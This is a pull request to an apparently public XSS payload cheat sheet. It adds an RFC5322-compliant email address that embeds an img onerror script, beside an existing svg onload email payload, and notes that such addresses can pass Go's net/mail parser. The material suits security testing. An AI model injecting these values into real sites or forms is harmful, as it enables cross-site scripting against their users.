### PR TITLE
Add additional XSS payload in email addresses RFC5322

### DIFF
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -783,6 +783,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 "><svg/onload=confirm(1)>"@x.y
 ```
 
+([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))
+
+```javascript
+xss@example.com(<img src='x' onerror='alert(document.location)'>)
+```
+
 ### Bypass document blacklist
 
 ```javascript


### PR DESCRIPTION
On multiple occasions I was able to toy around with email address validators that implement the RFC5322 syntax rules.
https://pkg.go.dev/net/mail#ParseAddress is one such instance where XSS (or HTML injection payloads) may pass through :)

Feel free to merge or alter descriptions as you see fit.